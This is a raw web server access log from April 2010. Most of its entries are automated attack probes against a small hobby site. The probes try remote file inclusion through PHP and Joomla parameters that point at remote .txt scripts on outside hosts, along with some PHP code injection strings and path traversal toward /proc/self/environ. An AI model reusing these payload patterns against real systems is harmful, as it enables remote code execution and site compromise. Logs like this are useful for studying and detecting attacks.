87.106.132.3 - - [19/Apr/2010:04:01:10 -0500] "GET //include/class_text_cfg.php?base_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:01:10 -0500] "GET /logs//include/class_text_cfg.php?base_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:01:10 -0500] "GET /logs/access_log.1263686400//include/class_text_cfg.php?base_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.7.34 - - [19/Apr/2010:04:02:48 -0500] "GET /logs/access_log.1270684800%20%20//bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.175.7.34 - - [19/Apr/2010:04:02:48 -0500] "GET /logs//bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.175.7.34 - - [19/Apr/2010:04:02:48 -0500] "GET //bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.46.13.134 - - [19/Apr/2010:04:03:17 -0500] "GET /logs/access_log.1221091200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/Apr/2010:04:04:34 -0500] "GET /logs/access_log.1242172800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.7.34 - - [19/Apr/2010:04:04:44 -0500] "GET //bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.175.7.34 - - [19/Apr/2010:04:04:44 -0500] "GET /logs//bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.175.7.34 - - [19/Apr/2010:04:04:44 -0500] "GET /logs/access_log.1270684800//bbs/delete_all.php?board_skin_path=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:09:23 -0500] "GET //admin/common.inc.php?base_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:09:23 -0500] "GET /logs/access_log.1263686400//admin/common.inc.php?base_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:09:23 -0500] "GET /logs//admin/common.inc.php?base_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.10.110.248 - - [19/Apr/2010:04:11:05 -0500] "GET //write_update.php?board_skin_path=http://www.janmclucas.com.au/.data/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
88.191.94.188 - - [19/Apr/2010:04:11:56 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:04:11:56 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:04:12:00 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:04:12:04 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:04:12:04 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:04:12:04 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [19/Apr/2010:04:12:11 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:04:12:12 -0500] "GET /logs/access_log.1248480000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [19/Apr/2010:04:12:14 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.204.184 - - [19/Apr/2010:04:15:48 -0500] "GET /logs/access_log.1173398400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.7.34 - - [19/Apr/2010:04:19:22 -0500] "GET /logs/access_log.1219363200%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
69.175.7.34 - - [19/Apr/2010:04:19:22 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.175.7.34 - - [19/Apr/2010:04:19:22 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:04:19:45 -0500] "GET /logs//skin/zetyx_grayscale/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:04:19:45 -0500] "GET /logs/access_log.1262736000//skin/zetyx_grayscale/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:04:19:45 -0500] "GET //skin/zetyx_grayscale/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:04:20:07 -0500] "GET /logs/access_log.1263340800//skin/zetyx_grayscale/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:04:24:29 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.7.34 - - [19/Apr/2010:04:28:47 -0500] "GET /logs/access_log.1219363200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:04:31:27 -0500] "GET /logs/access_log.1219363200%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:04:31:27 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:04:31:27 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.236.47.182 - - [19/Apr/2010:04:33:24 -0500] "GET /logs/access_log.1225238400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
202.154.177.234 - - [19/Apr/2010:04:33:50 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%3CHN-Community%3E? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
76.73.79.11 - - [19/Apr/2010:04:33:59 -0500] "GET /logs/access_log.1219363200%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:04:33:59 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:04:33:59 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:04:34:04 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.94 - - [19/Apr/2010:04:36:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.73.79.11 - - [19/Apr/2010:04:37:34 -0500] "GET /logs/access_log.1221696000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
76.73.79.11 - - [19/Apr/2010:04:37:38 -0500] "GET /logs/access_log.1215648000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kucing11.fileave.com/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:39:43 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:39:43 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:04:39:43 -0500] "GET /logs/access_log.1268265600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:04:46:21 -0500] "GET /logs/access_log.1258934400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
59.21.247.137 - - [19/Apr/2010:04:48:12 -0500] "GET ///skin/nzeo_ver3/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:04:48:12 -0500] "GET /logs///skin/nzeo_ver3/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:04:48:12 -0500] "GET /logs/access_log.1226275200///skin/nzeo_ver3/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:04:58:21 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 200 2334 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:04:58:21 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:04:58:21 -0500] "GET /logs/access_log.1237334400//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:04:59:57 -0500] "GET /artwork/banners.htm HTTP/1.1" 200 3537 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.241.251.224 - - [19/Apr/2010:05:00:17 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.251.224 - - [19/Apr/2010:05:00:17 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.241.251.224 - - [19/Apr/2010:05:00:17 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.207.26 - - [19/Apr/2010:05:01:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.216.43.133 - - [19/Apr/2010:05:02:58 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 200 2334 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:05:02:58 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.216.43.133 - - [19/Apr/2010:05:02:58 -0500] "GET /logs/access_log.1237334400//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kumcalb.org///g4/adm/img/thumb/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:05:04:31 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:05:04:31 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.113.184.23 - - [19/Apr/2010:05:04:31 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
212.241.251.224 - - [19/Apr/2010:05:04:35 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.195.228 - - [19/Apr/2010:05:05:48 -0500] "GET /logs/access_log.1238198400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.251.224 - - [19/Apr/2010:05:06:22 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
220.232.195.131 - - [19/Apr/2010:05:09:31 -0500] "GET /index.php?option=com_awiki&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [19/Apr/2010:05:09:31 -0500] "GET /logs/index.php?option=com_awiki&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [19/Apr/2010:05:09:32 -0500] "GET /index.php?option=com_awiki&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [19/Apr/2010:05:09:32 -0500] "GET /logs/index.php?option=com_awiki&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""-"
217.70.32.2 - - [19/Apr/2010:05:11:56 -0500] "GET /logs//sources/functions.php?CONFIG[main_path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:05:11:56 -0500] "GET /logs/access_log.1264291200//sources/functions.php?CONFIG[main_path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:05:11:56 -0500] "GET /logs/access_log.1263427200//sources/functions.php?CONFIG[main_path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:05:11:56 -0500] "GET //sources/functions.php?CONFIG[main_path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:05:12:13 -0500] "GET /logs/access_log.1251849600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.135 - - [19/Apr/2010:05:12:17 -0500] "GET /logs/access_log.1188691200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [19/Apr/2010:05:15:40 -0500] "GET //sources/template.php?CONFIG[main_path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:05:15:40 -0500] "GET /logs/access_log.1263427200//sources/template.php?CONFIG[main_path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
217.70.32.2 - - [19/Apr/2010:05:15:40 -0500] "GET /logs//sources/template.php?CONFIG[main_path]=http://dbdb.interfree.it/FxID1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.46.13.51 - - [19/Apr/2010:05:15:47 -0500] "GET /logs/access_log.1264982400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.234 - - [19/Apr/2010:05:17:47 -0500] "GET /logs/access_log.1242259200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
178.91.36.208 - - [19/Apr/2010:05:18:07 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "http://search.yahoo.com/search;_ylt=A0geusfULcxLAnUBP2JXNyoA?p=http%3A%2F%2Fbabelfish.yahoo.com%2Ftranslate_url%3Ftrurl%3D&fr2=sb-top&n=40&vf=all&sao=0""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
178.91.36.208 - - [19/Apr/2010:05:18:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
178.91.36.208 - - [19/Apr/2010:05:18:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.204.234 - - [19/Apr/2010:05:20:46 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/Apr/2010:05:20:52 -0500] "GET /costume/index1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [19/Apr/2010:05:20:55 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:05:20:55 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:05:20:55 -0500] "GET /logs/access_log.1220054400%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:05:21:13 -0500] "GET /logs//linkadmin.php?page=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:05:21:13 -0500] "GET /logs/access_log.1265760000//linkadmin.php?page=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:05:21:13 -0500] "GET //linkadmin.php?page=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.147.244.168 - - [19/Apr/2010:05:27:19 -0500] "GET //common/db.php?commonpath=http://www.speedofsoundrecording.com/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
69.147.244.168 - - [19/Apr/2010:05:27:23 -0500] "GET //common/db.php?commonpath=http://www.speedofsoundrecording.com/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
212.241.251.224 - - [19/Apr/2010:05:28:02 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:13 -0500] "GET /logs/access_log.1219363200%20%20/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:13 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:13 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:17 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:17 -0500] "GET /logs/access_log.1219363200%20%20/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:17 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:54 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:57 -0500] "GET /logs/access_log.1219708800/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:28:57 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:29:00 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:29:05 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:29:05 -0500] "GET /logs/access_log.1219708800/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:05:29:50 -0500] "GET /logs//linkadmin.php?page=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:05:29:50 -0500] "GET //linkadmin.php?page=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.208.34.38 - - [19/Apr/2010:05:29:50 -0500] "GET /logs/access_log.1265760000//linkadmin.php?page=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:05:30:25 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:05:30:25 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.106.132.3 - - [19/Apr/2010:05:30:25 -0500] "GET /logs/access_log.1219708800%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:05:30:32 -0500] "GET /logs/access_log.1245974400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.132.3 - - [19/Apr/2010:05:30:51 -0500] "GET /logs/access_log.1220054400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:05:38:02 -0500] "GET /logs/access_log.1230940800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.114.135.218 - - [19/Apr/2010:05:43:55 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:43:55 -0500] "GET /logs/access_log.1219708800%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
85.114.135.218 - - [19/Apr/2010:05:43:55 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kucing11.fileave.com/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:05:44:50 -0500] "GET /logs/access_log.1254873600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.98 - - [19/Apr/2010:05:46:30 -0500] "GET /logs/access_log.1193443200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
59.21.247.137 - - [19/Apr/2010:05:49:32 -0500] "GET //setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:05:49:32 -0500] "GET /logs//setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
59.21.247.137 - - [19/Apr/2010:05:49:32 -0500] "GET /logs/access_log.1266537600//setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [19/Apr/2010:05:50:53 -0500] "GET /logs/access_log.1253232000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.254.228.21 - - [19/Apr/2010:05:56:23 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 2334 "-""Mozilla/5.0"
